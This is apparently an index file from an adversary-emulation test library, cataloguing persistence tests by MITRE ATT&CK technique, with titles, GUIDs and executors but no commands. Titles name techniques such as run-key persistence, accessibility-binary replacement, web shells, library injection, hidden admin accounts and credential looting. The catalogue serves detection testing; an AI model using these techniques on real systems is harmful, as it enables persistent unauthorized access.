persistence,T1112,Modify Registry,75,Enforce Smart Card Authentication Through Registry,4c4bf587-fe7f-448f-ba8d-1ecec9db88be,command_prompt
persistence,T1112,Modify Registry,76,Requires the BitLocker PIN for Pre-boot authentication,26fc7375-a551-4336-90d7-3f2817564304,command_prompt
persistence,T1112,Modify Registry,77,Modify EnableBDEWithNoTPM Registry entry,bacb3e73-8161-43a9-8204-a69fe0e4b482,command_prompt
persistence,T1112,Modify Registry,78,Modify UseTPM Registry entry,7c8c7bd8-0a5c-4514-a6a3-0814c5a98cf0,command_prompt
persistence,T1112,Modify Registry,79,Modify UseTPMPIN Registry entry,10b33fb0-c58b-44cd-8599-b6da5ad6384c,command_prompt
persistence,T1112,Modify Registry,80,Modify UseTPMKey Registry entry,c8480c83-a932-446e-a919-06a1fd1e512a,command_prompt
persistence,T1112,Modify Registry,81,Modify UseTPMKeyPIN Registry entry,02d8b9f7-1a51-4011-8901-2d55cca667f9,command_prompt
persistence,T1112,Modify Registry,82,Modify EnableNonTPM Registry entry,e672a340-a933-447c-954c-d68db38a09b1,command_prompt
persistence,T1112,Modify Registry,83,Modify UsePartialEncryptionKey Registry entry,b5169fd5-85c8-4b2c-a9b6-64cc0b9febef,command_prompt
persistence,T1112,Modify Registry,84,Modify UsePIN Registry entry,3ac0b30f-532f-43c6-8f01-fb657aaed7e4,command_prompt
persistence,T1112,Modify Registry,85,Abusing Windows TelemetryController Registry Key for Persistence,4469192c-2d2d-4a3a-9758-1f31d937a92b,command_prompt
persistence,T1112,Modify Registry,86,Modify RDP-Tcp Initial Program Registry Entry,c691cee2-8d17-4395-b22f-00644c7f1c2d,command_prompt
persistence,T1112,Modify Registry,87,Abusing MyComputer Disk Cleanup Path for Persistence,f2915249-4485-42e2-96b7-9bf34328d497,command_prompt
persistence,T1112,Modify Registry,88,Abusing MyComputer Disk Fragmentation Path for Persistence,3235aafe-b49d-451b-a1f1-d979fa65ddaf,command_prompt
persistence,T1112,Modify Registry,89,Abusing MyComputer Disk Backup Path for Persistence,599f3b5c-0323-44ed-bb63-4551623bf675,command_prompt
persistence,T1112,Modify Registry,90,Adding custom paths for application execution,573d15da-c34e-4c59-a7d2-18f20d92dfa3,command_prompt
persistence,T1543.004,Create or Modify System Process: Launch Daemon,1,Launch Daemon,03ab8df5-3a6b-4417-b6bd-bb7a5cfd74cf,bash
persistence,T1574.008,Hijack Execution Flow: Path Interception by Search Order Hijacking,1,powerShell Persistence via hijacking default modules - Get-Variable.exe,1561de08-0b4b-498e-8261-e922f3494aae,powershell
persistence,T1505.003,Server Software Component: Web Shell,1,Web Shell Written to Disk,0a2ce662-1efa-496f-a472-2fe7b080db16,command_prompt
persistence,T1078.001,Valid Accounts: Default Accounts,1,Enable Guest account with RDP capability and admin privileges,99747561-ed8d-47f2-9c91-1e5fde1ed6e0,command_prompt
persistence,T1078.001,Valid Accounts: Default Accounts,2,Activate Guest Account,aa6cb8c4-b582-4f8e-b677-37733914abda,command_prompt
persistence,T1078.001,Valid Accounts: Default Accounts,3,Enable Guest Account on macOS,0315bdff-4178-47e9-81e4-f31a6d23f7e4,sh
persistence,T1547.003,Time Providers,1,Create a new time provider,df1efab7-bc6d-4b88-8be9-91f55ae017aa,powershell
persistence,T1547.003,Time Providers,2,Edit an existing time provider,29e0afca-8d1d-471a-8d34-25512fc48315,powershell
persistence,T1546.005,Event Triggered Execution: Trap,1,Trap EXIT,a74b2e07-5952-4c03-8b56-56274b076b61,sh
persistence,T1546.005,Event Triggered Execution: Trap,2,Trap EXIT (freebsd),be1a5d70-6865-44aa-ab50-42244c9fd16f,sh
persistence,T1546.005,Event Triggered Execution: Trap,3,Trap SIGINT,a547d1ba-1d7a-4cc5-a9cb-8d65e8809636,sh
persistence,T1546.005,Event Triggered Execution: Trap,4,Trap SIGINT (freebsd),ade10242-1eac-43df-8412-be0d4c704ada,sh
persistence,T1574.006,Hijack Execution Flow: LD_PRELOAD,1,Shared Library Injection via /etc/ld.so.preload,39cb0e67-dd0d-4b74-a74b-c072db7ae991,bash
persistence,T1574.006,Hijack Execution Flow: LD_PRELOAD,2,Shared Library Injection via LD_PRELOAD,bc219ff7-789f-4d51-9142-ecae3397deae,bash
persistence,T1574.006,Hijack Execution Flow: LD_PRELOAD,3,Dylib Injection via DYLD_INSERT_LIBRARIES,4d66029d-7355-43fd-93a4-b63ba92ea1be,bash
persistence,T1136.001,Create Account: Local Account,1,Create a user account on a Linux system,40d8eabd-e394-46f6-8785-b9bfa1d011d2,bash
persistence,T1136.001,Create Account: Local Account,2,Create a user account on a FreeBSD system,a39ee1bc-b8c1-4331-8e5f-1859eb408518,sh
persistence,T1136.001,Create Account: Local Account,3,Create a user account on a MacOS system,01993ba5-1da3-4e15-a719-b690d4f0f0b2,bash
persistence,T1136.001,Create Account: Local Account,4,Create a new user in a command prompt,6657864e-0323-4206-9344-ac9cd7265a4f,command_prompt
persistence,T1136.001,Create Account: Local Account,5,Create a new user in PowerShell,bc8be0ac-475c-4fbf-9b1d-9fffd77afbde,powershell
persistence,T1136.001,Create Account: Local Account,6,Create a new user in Linux with `root` UID and GID.,a1040a30-d28b-4eda-bd99-bb2861a4616c,bash
persistence,T1136.001,Create Account: Local Account,7,Create a new user in FreeBSD with `root` GID.,d141afeb-d2bc-4934-8dd5-b7dba0f9f67a,sh
persistence,T1136.001,Create Account: Local Account,8,Create a new Windows admin user,fda74566-a604-4581-a4cc-fbbe21d66559,command_prompt
persistence,T1136.001,Create Account: Local Account,9,Create a new Windows admin user via .NET,2170d9b5-bacd-4819-a952-da76dae0815f,powershell
persistence,T1136.001,Create Account: Local Account,10,Create a Linux user via kubectl in a Pod,d9efa6c7-6518-42b2-809a-4f2a8e242b9b,bash
persistence,T1547.004,Boot or Logon Autostart Execution: Winlogon Helper DLL,1,Winlogon Shell Key Persistence - PowerShell,bf9f9d65-ee4d-4c3e-a843-777d04f19c38,powershell
persistence,T1547.004,Boot or Logon Autostart Execution: Winlogon Helper DLL,2,Winlogon Userinit Key Persistence - PowerShell,fb32c935-ee2e-454b-8fa3-1c46b42e8dfb,powershell
persistence,T1547.004,Boot or Logon Autostart Execution: Winlogon Helper DLL,3,Winlogon Notify Key Logon Persistence - PowerShell,d40da266-e073-4e5a-bb8b-2b385023e5f9,powershell
persistence,T1547.004,Boot or Logon Autostart Execution: Winlogon Helper DLL,4,Winlogon HKLM Shell Key Persistence - PowerShell,95a3c42f-8c88-4952-ad60-13b81d929a9d,powershell
persistence,T1547.004,Boot or Logon Autostart Execution: Winlogon Helper DLL,5,Winlogon HKLM Userinit Key Persistence - PowerShell,f9b8daff-8fa7-4e6a-a1a7-7c14675a545b,powershell
persistence,T1098.004,SSH Authorized Keys,1,Modify SSH Authorized Keys,342cc723-127c-4d3a-8292-9c0c6b4ecadc,sh
persistence,T1546.012,Event Triggered Execution: Image File Execution Options Injection,1,IFEO Add Debugger,fdda2626-5234-4c90-b163-60849a24c0b8,command_prompt
persistence,T1546.012,Event Triggered Execution: Image File Execution Options Injection,2,IFEO Global Flags,46b1f278-c8ee-4aa5-acce-65e77b11f3c1,command_prompt
persistence,T1546.012,Event Triggered Execution: Image File Execution Options Injection,3,GlobalFlags in Image File Execution Options,13117939-c9b2-4a43-999e-0a543df92f0d,powershell
persistence,T1546.008,Event Triggered Execution: Accessibility Features,1,Attaches Command Prompt as a Debugger to a List of Target Processes,3309f53e-b22b-4eb6-8fd2-a6cf58b355a9,powershell
persistence,T1546.008,Event Triggered Execution: Accessibility Features,2,Replace binary of sticky keys,934e90cf-29ca-48b3-863c-411737ad44e3,command_prompt
persistence,T1546.008,Event Triggered Execution: Accessibility Features,3,Create Symbolic Link From osk.exe to cmd.exe,51ef369c-5e87-4f33-88cd-6d61be63edf2,command_prompt
persistence,T1546.008,Event Triggered Execution: Accessibility Features,4,Atbroker.exe (AT) Executes Arbitrary Command via Registry Key,444ff124-4c83-4e28-8df6-6efd3ece6bd4,command_prompt
persistence,T1546.008,Event Triggered Execution: Accessibility Features,5,Auto-start application on user logon,7125eba8-7b30-426b-9147-781d152be6fb,command_prompt
persistence,T1546.008,Event Triggered Execution: Accessibility Features,6,Replace utilman.exe (Ease of Access Binary) with cmd.exe,1db380da-3422-481d-a3c8-6d5770dba580,command_prompt
persistence,T1546.008,Event Triggered Execution: Accessibility Features,7,Replace Magnify.exe (Magnifier binary) with cmd.exe,5e4fa70d-c789-470e-85e1-6992b92bb321,command_prompt
persistence,T1546.008,Event Triggered Execution: Accessibility Features,8,Replace Narrator.exe (Narrator binary) with cmd.exe,2002f5ea-cd13-4c82-bf73-e46722e5dc5e,command_prompt
persistence,T1546.008,Event Triggered Execution: Accessibility Features,9,Replace DisplaySwitch.exe (Display Switcher binary) with cmd.exe,825ba8ca-71cc-436b-b1dd-ea0d5e109086,command_prompt
persistence,T1546.008,Event Triggered Execution: Accessibility Features,10,Replace AtBroker.exe (App Switcher binary) with cmd.exe,210be7ea-d841-40ec-b3e1-ff610bb62744,command_prompt
persistence,T1136.002,Create Account: Domain Account,1,Create a new Windows domain admin user,fcec2963-9951-4173-9bfa-98d8b7834e62,command_prompt
persistence,T1136.002,Create Account: Domain Account,2,Create a new account similar to ANONYMOUS LOGON,dc7726d2-8ccb-4cc6-af22-0d5afb53a548,command_prompt
persistence,T1136.002,Create Account: Domain Account,3,Create a new Domain Account using PowerShell,5a3497a4-1568-4663-b12a-d4a5ed70c7d7,powershell
persistence,T1136.002,Create Account: Domain Account,4,Active Directory Create Admin Account,562aa072-524e-459a-ba2b-91f1afccf5ab,sh
persistence,T1136.002,Create Account: Domain Account,5,Active Directory Create User Account (Non-elevated),8c992cb3-a46e-4fd5-b005-b1bab185af31,sh
persistence,T1137.001,Office Application Startup: Office Template Macros.,1,Injecting a Macro into the Word Normal.dotm Template for Persistence via PowerShell,940db09e-80b6-4dd0-8d4d-7764f89b47a8,powershell
persistence,T1546.009,Event Triggered Execution: AppCert DLLs,1,Create registry persistence via AppCert DLL,a5ad6104-5bab-4c43-b295-b4c44c7c6b05,powershell
persistence,T1547.015,Boot or Logon Autostart Execution: Login Items,1,Persistence by modifying Windows Terminal profile,ec5d76ef-82fe-48da-b931-bdb25a62bc65,powershell
persistence,T1547.015,Boot or Logon Autostart Execution: Login Items,2,Add macOS LoginItem using Applescript,716e756a-607b-41f3-8204-b214baf37c1d,bash
persistence,T1098.001,Account Manipulation: Additional Cloud Credentials,1,Azure AD Application Hijacking - Service Principal,b8e747c3-bdf7-4d71-bce2-f1df2a057406,powershell
persistence,T1098.001,Account Manipulation: Additional Cloud Credentials,2,Azure AD Application Hijacking - App Registration,a12b5531-acab-4618-a470-0dafb294a87a,powershell
persistence,T1098.001,Account Manipulation: Additional Cloud Credentials,3,AWS - Create Access Key and Secret Key,8822c3b0-d9f9-4daf-a043-491160a31122,sh
persistence,T1546.003,Event Triggered Execution: Windows Management Instrumentation Event Subscription,1,Persistence via WMI Event Subscription - CommandLineEventConsumer,3c64f177-28e2-49eb-a799-d767b24dd1e0,powershell
persistence,T1546.003,Event Triggered Execution: Windows Management Instrumentation Event Subscription,2,Persistence via WMI Event Subscription - ActiveScriptEventConsumer,fecd0dfd-fb55-45fa-a10b-6250272d0832,powershell
persistence,T1546.003,Event Triggered Execution: Windows Management Instrumentation Event Subscription,3,Windows MOFComp.exe Load MOF File,29786d7e-8916-4de6-9c55-be7b093b2706,powershell
persistence,T1546.001,Event Triggered Execution: Change Default File Association,1,Change Default File Association,10a08978-2045-4d62-8c42-1957bbbea102,command_prompt
persistence,T1546.014,Event Triggered Execution: Emond,1,Persistance with Event Monitor - emond,23c9c127-322b-4c75-95ca-eff464906114,sh
persistence,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,1,Reg Key Run,e55be3fd-3521-4610-9d1a-e210e42dcf05,command_prompt
persistence,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,2,Reg Key RunOnce,554cbd88-cde1-4b56-8168-0be552eed9eb,command_prompt
persistence,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,3,PowerShell Registry RunOnce,eb44f842-0457-4ddc-9b92-c4caa144ac42,powershell
persistence,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,4,Suspicious vbs file run from startup Folder,2cb98256-625e-4da9-9d44-f2e5f90b8bd5,powershell
persistence,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,5,Suspicious jse file run from startup Folder,dade9447-791e-4c8f-b04b-3a35855dfa06,powershell
persistence,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,6,Suspicious bat file run from startup Folder,5b6768e4-44d2-44f0-89da-a01d1430fd5e,powershell
persistence,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,7,Add Executable Shortcut Link to User Startup Folder,24e55612-85f6-4bd6-ae74-a73d02e3441d,powershell
persistence,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,8,Add persistance via Recycle bin,bda6a3d6-7aa7-4e89-908b-306772e9662f,command_prompt
persistence,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,9,SystemBC Malware-as-a-Service Registry,9dc7767b-30c1-4cc4-b999-50cab5e27891,powershell
persistence,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,10,Change Startup Folder - HKLM Modify User Shell Folders Common Startup Value,acfef903-7662-447e-a391-9c91c2f00f7b,powershell
persistence,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,11,Change Startup Folder - HKCU Modify User Shell Folders Startup Value,8834b65a-f808-4ece-ad7e-2acdf647aafa,powershell
persistence,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,12,HKCU - Policy Settings Explorer Run Key,a70faea1-e206-4f6f-8d9a-67379be8f6f1,powershell
persistence,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,13,HKLM - Policy Settings Explorer Run Key,b5c9a9bc-dda3-4ea0-b16a-add8e81ab75f,powershell
persistence,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,14,HKLM - Append Command to Winlogon Userinit KEY Value,f7fab6cc-8ece-4ca7-a0f1-30a22fccd374,powershell
persistence,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,15,HKLM - Modify default System Shell - Winlogon Shell KEY Value ,1d958c61-09c6-4d9e-b26b-4130314e520e,powershell
persistence,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,16,secedit used to create a Run key in the HKLM Hive,14fdc3f1-6fc3-4556-8d36-aa89d9d42d02,command_prompt
persistence,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,17,Modify BootExecute Value,befc2b40-d487-4a5a-8813-c11085fb5672,powershell
persistence,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,18,Allowing custom application to execute during new RDP logon session,b051b3c0-66e7-4a81-916d-e6383bd3a669,command_prompt
persistence,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,19,Creating Boot Verification Program Key for application execution during successful boot,6e1666d5-3f2b-4b9a-80aa-f011322380d4,command_prompt
persistence,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,20,Add persistence via Windows Context Menu,de47f4a0-2acb-416d-9a6b-cee584a4c4d1,command_prompt
persistence,T1136.003,Create Account: Cloud Account,1,AWS - Create a new IAM user,8d1c2368-b503-40c9-9057-8e42f21c58ad,sh
persistence,T1136.003,Create Account: Cloud Account,2,Azure AD - Create a new user,e62d23ef-3153-4837-8625-fa4a3829134d,powershell
persistence,T1136.003,Create Account: Cloud Account,3,Azure AD - Create a new user via Azure CLI,228c7498-be31-48e9-83b7-9cb906504ec8,powershell
persistence,T1098,Account Manipulation,1,Admin Account Manipulate,5598f7cb-cf43-455e-883a-f6008c5d46af,powershell
persistence,T1098,Account Manipulation,2,Domain Account and Group Manipulate,a55a22e9-a3d3-42ce-bd48-2653adb8f7a9,powershell
persistence,T1098,Account Manipulation,3,AWS - Create a group and add a user to that group,8822c3b0-d9f9-4daf-a043-49f110a31122,sh
persistence,T1098,Account Manipulation,4,Azure AD - adding user to Azure AD role,0e65ae27-5385-46b4-98ac-607a8ee82261,powershell
persistence,T1098,Account Manipulation,5,Azure AD - adding service principal to Azure AD role,92c40b3f-c406-4d1f-8d2b-c039bf5009e4,powershell
persistence,T1098,Account Manipulation,6,Azure - adding user to Azure role in subscription,1a94b3fc-b080-450a-b3d8-6d9b57b472ea,powershell
persistence,T1098,Account Manipulation,7,Azure - adding service principal to Azure role in subscription,c8f4bc29-a151-48da-b3be-4680af56f404,powershell
persistence,T1098,Account Manipulation,8,Azure AD - adding permission to application,94ea9cc3-81f9-4111-8dde-3fb54f36af4b,powershell
persistence,T1098,Account Manipulation,9,Password Change on Directory Service Restore Mode (DSRM) Account,d5b886d9-d1c7-4b6e-a7b0-460041bf2823,command_prompt
persistence,T1098,Account Manipulation,10,Domain Password Policy Check: Short Password,fc5f9414-bd67-4f5f-a08e-e5381e29cbd1,powershell
persistence,T1098,Account Manipulation,11,Domain Password Policy Check: No Number in Password,68190529-069b-4ffc-a942-919704158065,powershell
persistence,T1098,Account Manipulation,12,Domain Password Policy Check: No Special Character in Password,7d984ef2-2db2-4cec-b090-e637e1698f61,powershell
persistence,T1098,Account Manipulation,13,Domain Password Policy Check: No Uppercase Character in Password,b299c120-44a7-4d68-b8e2-8ba5a28511ec,powershell
persistence,T1098,Account Manipulation,14,Domain Password Policy Check: No Lowercase Character in Password,945da11e-977e-4dab-85d2-f394d03c5887,powershell
persistence,T1098,Account Manipulation,15,Domain Password Policy Check: Only Two Character Classes,784d1349-5a26-4d20-af5e-d6af53bae460,powershell
persistence,T1098,Account Manipulation,16,Domain Password Policy Check: Common Password Use,81959d03-c51f-49a1-bb24-23f1ec885578,powershell
persistence,T1098,Account Manipulation,17,GCP - Delete Service Account Key,7ece1dea-49f1-4d62-bdcc-5801e3292510,sh
persistence,T1547.006,Boot or Logon Autostart Execution: Kernel Modules and Extensions,1,Linux - Load Kernel Module via insmod,687dcb93-9656-4853-9c36-9977315e9d23,bash
persistence,T1547.006,Boot or Logon Autostart Execution: Kernel Modules and Extensions,2,MacOS - Load Kernel Module via kextload and kmutil,f4391089-d3a5-4dd1-ab22-0419527f2672,bash
persistence,T1547.006,Boot or Logon Autostart Execution: Kernel Modules and Extensions,3,MacOS - Load Kernel Module via KextManagerLoadKextWithURL(),f0007753-beb3-41ea-9948-760785e4c1e5,bash
persistence,T1547.006,Boot or Logon Autostart Execution: Kernel Modules and Extensions,4,Snake Malware Kernel Driver Comadmin,e5cb5564-cc7b-4050-86e8-f2d9eec1941f,powershell
persistence,T1053.006,Scheduled Task/Job: Systemd Timers,1,Create Systemd Service and Timer,f4983098-bb13-44fb-9b2c-46149961807b,bash
persistence,T1053.006,Scheduled Task/Job: Systemd Timers,2,Create a user level transient systemd service and timer,3de33f5b-62e5-4e63-a2a0-6fd8808c80ec,sh
persistence,T1053.006,Scheduled Task/Job: Systemd Timers,3,Create a system level transient systemd service and timer,d3eda496-1fc0-49e9-aff5-3bec5da9fa22,sh
persistence,T1505.004,IIS Components,1,Install IIS Module using AppCmd.exe,53adbdfa-8200-490c-871c-d3b1ab3324b2,command_prompt
persistence,T1505.004,IIS Components,2,Install IIS Module using PowerShell Cmdlet New-WebGlobalModule,cc3381fb-4bd0-405c-a8e4-6cacfac3b06c,powershell
persistence,T1546,Event Triggered Execution,1,Persistence with Custom AutodialDLL,aca9ae16-7425-4b6d-8c30-cad306fdbd5b,powershell
persistence,T1546,Event Triggered Execution,2,HKLM - Persistence using CommandProcessor AutoRun key (With Elevation),a574dafe-a903-4cce-9701-14040f4f3532,powershell
persistence,T1546,Event Triggered Execution,3,HKCU - Persistence using CommandProcessor AutoRun key (Without Elevation),36b8dbf9-59b1-4e9b-a3bb-36e80563ef01,powershell
persistence,T1546,Event Triggered Execution,4,WMI Invoke-CimMethod Start Process,adae83d3-0df6-45e7-b2c3-575f91584577,powershell
persistence,T1546,Event Triggered Execution,5,Adding custom debugger for Windows Error Reporting,17d1a3cc-3373-495a-857a-e5dd005fb302,command_prompt
persistence,T1546,Event Triggered Execution,6,Load custom DLL on mstsc execution,2db7852e-5a32-4ec7-937f-f4e027881700,command_prompt
persistence,T1546,Event Triggered Execution,7,Persistence using automatic execution of custom DLL during RDP session,b7fc4c3f-fe6e-479a-ba27-ef91b88536e3,command_prompt
persistence,T1546,Event Triggered Execution,8,Persistence via ErrorHandler.cmd script execution,547a4736-dd1c-4b48-b4fe-e916190bb2e7,powershell
persistence,T1546,Event Triggered Execution,9,Persistence using STARTUP-PATH in MS-WORD,f0027655-25ef-47b0-acaf-3d83d106156c,command_prompt
persistence,T1546.004,Event Triggered Execution: .bash_profile .bashrc and .shrc,1,Add command to .bash_profile,94500ae1-7e31-47e3-886b-c328da46872f,sh
persistence,T1546.004,Event Triggered Execution: .bash_profile .bashrc and .shrc,2,Add command to .bashrc,0a898315-4cfa-4007-bafe-33a4646d115f,sh
persistence,T1546.004,Event Triggered Execution: .bash_profile .bashrc and .shrc,3,Add command to .shrc,41502021-591a-4649-8b6e-83c9192aff53,sh
persistence,T1546.004,Event Triggered Execution: .bash_profile .bashrc and .shrc,4,Append to the system shell profile,694b3cc8-6a78-4d35-9e74-0123d009e94b,sh
persistence,T1546.004,Event Triggered Execution: .bash_profile .bashrc and .shrc,5,Append commands user shell profile,bbdb06bc-bab6-4f5b-8232-ba3fbed51d77,sh
persistence,T1546.004,Event Triggered Execution: .bash_profile .bashrc and .shrc,6,System shell profile scripts,8fe2ccfd-f079-4c03-b1a9-bd9b362b67d4,sh
persistence,T1546.004,Event Triggered Execution: .bash_profile .bashrc and .shrc,7,Create/Append to .bash_logout,37ad2f24-7c53-4a50-92da-427a4ad13f58,bash
persistence,T1547.002,Authentication Package,1,Authentication Package,be2590e8-4ac3-47ac-b4b5-945820f2fbe9,powershell
persistence,T1546.015,Event Triggered Execution: Component Object Model Hijacking,1,COM Hijacking - InprocServer32,48117158-d7be-441b-bc6a-d9e36e47b52b,powershell
persistence,T1546.015,Event Triggered Execution: Component Object Model Hijacking,2,Powershell Execute COM Object,752191b1-7c71-445c-9dbe-21bb031b18eb,powershell
persistence,T1546.015,Event Triggered Execution: Component Object Model Hijacking,3,COM Hijacking with RunDLL32 (Local Server Switch),123520cc-e998-471b-a920-bd28e3feafa0,powershell
persistence,T1546.015,Event Triggered Execution: Component Object Model Hijacking,4,COM hijacking via TreatAs,33eacead-f117-4863-8eb0-5c6304fbfaa9,powershell
persistence,T1137.004,Office Application Startup: Outlook Home Page,1,Install Outlook Home Page Persistence,7a91ad51-e6d2-4d43-9471-f26362f5738e,command_prompt
persistence,T1574.009,Hijack Execution Flow: Path Interception by Unquoted Path,1,Execution of program.exe as service with unquoted service path,2770dea7-c50f-457b-84c4-c40a47460d9f,command_prompt
persistence,T1037.005,Boot or Logon Initialization Scripts: Startup Items,1,Add file to Local Library StartupItems,134627c3-75db-410e-bff8-7a920075f198,sh
persistence,T1037.005,Boot or Logon Initialization Scripts: Startup Items,2,Add launch script to launch daemon,fc369906-90c7-4a15-86fd-d37da624dde6,bash
persistence,T1037.005,Boot or Logon Initialization Scripts: Startup Items,3,Add launch script to launch agent,10cf5bec-49dd-4ebf-8077-8f47e420096f,bash
persistence,T1197,BITS Jobs,1,Bitsadmin Download (cmd),3c73d728-75fb-4180-a12f-6712864d7421,command_prompt
persistence,T1197,BITS Jobs,2,Bitsadmin Download (PowerShell),f63b8bc4-07e5-4112-acba-56f646f3f0bc,powershell
persistence,T1197,BITS Jobs,3,"Persist, Download, & Execute",62a06ec5-5754-47d2-bcfc-123d8314c6ae,command_prompt
persistence,T1197,BITS Jobs,4,Bits download using desktopimgdownldr.exe (cmd),afb5e09e-e385-4dee-9a94-6ee60979d114,command_prompt
persistence,T1546.010,Event Triggered Execution: AppInit DLLs,1,Install AppInit Shim,a58d9386-3080-4242-ab5f-454c16503d18,command_prompt
persistence,T1546.002,Event Triggered Execution: Screensaver,1,Set Arbitrary Binary as Screensaver,281201e7-de41-4dc9-b73d-f288938cbb64,command_prompt
persistence,T1543.001,Create or Modify System Process: Launch Agent,1,Launch Agent,a5983dee-bf6c-4eaf-951c-dbc1a7b90900,bash
persistence,T1543.001,Create or Modify System Process: Launch Agent,2,Event Monitor Daemon Persistence,11979f23-9b9d-482a-9935-6fc9cd022c3e,bash
persistence,T1543.001,Create or Modify System Process: Launch Agent,3,Launch Agent - Root Directory,66774fa8-c562-4bae-a58d-5264a0dd9dd7,bash
persistence,T1037.004,Boot or Logon Initialization Scripts: Rc.common,1,rc.common,97a48daa-8bca-4bc0-b1a9-c1d163e762de,bash
persistence,T1037.004,Boot or Logon Initialization Scripts: Rc.common,2,rc.common,c33f3d80-5f04-419b-a13a-854d1cbdbf3a,bash
persistence,T1037.004,Boot or Logon Initialization Scripts: Rc.common,3,rc.local,126f71af-e1c9-405c-94ef-26a47b16c102,sh
persistence,T1543.002,Create or Modify System Process: SysV/Systemd Service,1,Create Systemd Service,d9e4f24f-aa67-4c6e-bcbf-85622b697a7c,bash
persistence,T1543.002,Create or Modify System Process: SysV/Systemd Service,2,Create SysV Service,760fe8d2-79d9-494f-905e-a239a3df86f6,sh
persistence,T1543.002,Create or Modify System Process: SysV/Systemd Service,3,"Create Systemd Service file, Enable the service , Modify and Reload the service.",c35ac4a8-19de-43af-b9f8-755da7e89c89,bash
persistence,T1547.007,Boot or Logon Autostart Execution: Re-opened Applications,1,Copy in loginwindow.plist for Re-Opened Applications,5fefd767-ef54-4ac6-84d3-751ab85e8aba,sh
persistence,T1547.007,Boot or Logon Autostart Execution: Re-opened Applications,2,Re-Opened Applications using LoginHook,5f5b71da-e03f-42e7-ac98-d63f9e0465cb,sh
persistence,T1547.007,Boot or Logon Autostart Execution: Re-opened Applications,3,Append to existing loginwindow for Re-Opened Applications,766b6c3c-9353-4033-8b7e-38b309fa3a93,sh
persistence,T1098.002,Account Manipulation: Additional Email Delegate Permissions,1,EXO - Full access mailbox permission granted to a user,17d046be-fdd0-4cbb-b5c7-55c85d9d0714,powershell
persistence,T1037.001,Boot or Logon Initialization Scripts: Logon Script (Windows),1,Logon Scripts,d6042746-07d4-4c92-9ad8-e644c114a231,command_prompt
persistence,T1137.002,Office Application Startup: Office Test,1,Office Application Startup Test Persistence (HKCU),c3e35b58-fe1c-480b-b540-7600fb612563,powershell
persistence,T1547.008,Boot or Logon Autostart Execution: LSASS Driver,1,Modify Registry to load Arbitrary DLL into LSASS - LsaDbExtPt,8ecef16d-d289-46b4-917b-0dba6dc81cf1,powershell
persistence,T1078.004,Valid Accounts: Cloud Accounts,1,Creating GCP Service Account and Service Account Key,9fdd83fd-bd53-46e5-a716-9dec89c8ae8e,sh
persistence,T1078.004,Valid Accounts: Cloud Accounts,2,Azure Persistence Automation Runbook Created or Modified,348f4d14-4bd3-4f6b-bd8a-61237f78b3ac,powershell
persistence,T1078.004,Valid Accounts: Cloud Accounts,3,GCP - Create Custom IAM Role,3a159042-69e6-4398-9a69-3308a4841c85,sh
persistence,T1053.002,Scheduled Task/Job: At,1,At.exe Scheduled task,4a6c0dc4-0f2a-4203-9298-a5a9bdc21ed8,command_prompt
persistence,T1053.002,Scheduled Task/Job: At,2,At - Schedule a job,7266d898-ac82-4ec0-97c7-436075d0d08e,sh
persistence,T1053.002,Scheduled Task/Job: At,3,At - Schedule a job via kubectl in a Pod,9ddf2e5e-7e2c-46c2-9940-3c2ff29c7213,bash
persistence,T1546.007,Event Triggered Execution: Netsh Helper DLL,1,Netsh Helper DLL Registration,3244697d-5a3a-4dfc-941c-550f69f91a4d,command_prompt
persistence,T1078.003,Valid Accounts: Local Accounts,1,Create local account with admin privileges,a524ce99-86de-4db6-b4f9-e08f35a47a15,command_prompt
persistence,T1078.003,Valid Accounts: Local Accounts,2,Create local account with admin privileges - MacOS,f1275566-1c26-4b66-83e3-7f9f7f964daa,bash
persistence,T1078.003,Valid Accounts: Local Accounts,3,Create local account with admin privileges using sysadminctl utility - MacOS,191db57d-091a-47d5-99f3-97fde53de505,bash
persistence,T1078.003,Valid Accounts: Local Accounts,4,Enable root account using dsenableroot utility - MacOS,20b40ea9-0e17-4155-b8e6-244911a678ac,bash
persistence,T1078.003,Valid Accounts: Local Accounts,5,Add a new/existing user to the admin group using dseditgroup utility - macOS,433842ba-e796-4fd5-a14f-95d3a1970875,bash
persistence,T1078.003,Valid Accounts: Local Accounts,6,WinPwn - Loot local Credentials - powerhell kittie,9e9fd066-453d-442f-88c1-ad7911d32912,powershell
persistence,T1078.003,Valid Accounts: Local Accounts,7,WinPwn - Loot local Credentials - Safetykatz,e9fdb899-a980-4ba4-934b-486ad22e22f4,powershell
persistence,T1078.003,Valid Accounts: Local Accounts,8,Create local account (Linux),02a91c34-8a5b-4bed-87af-501103eb5357,bash
persistence,T1078.003,Valid Accounts: Local Accounts,9,Reactivate a locked/expired account (Linux),d2b95631-62d7-45a3-aaef-0972cea97931,bash
persistence,T1078.003,Valid Accounts: Local Accounts,10,Reactivate a locked/expired account (FreeBSD),09e3380a-fae5-4255-8b19-9950be0252cf,sh
persistence,T1078.003,Valid Accounts: Local Accounts,11,Login as nobody (Linux),3d2cd093-ee05-41bd-a802-59ee5c301b85,bash
persistence,T1078.003,Valid Accounts: Local Accounts,12,Login as nobody (freebsd),16f6374f-7600-459a-9b16-6a88fd96d310,sh
persistence,T1078.003,Valid Accounts: Local Accounts,13,Use PsExec to elevate to NT Authority\SYSTEM account,6904235f-0f55-4039-8aed-41c300ff7733,command_prompt
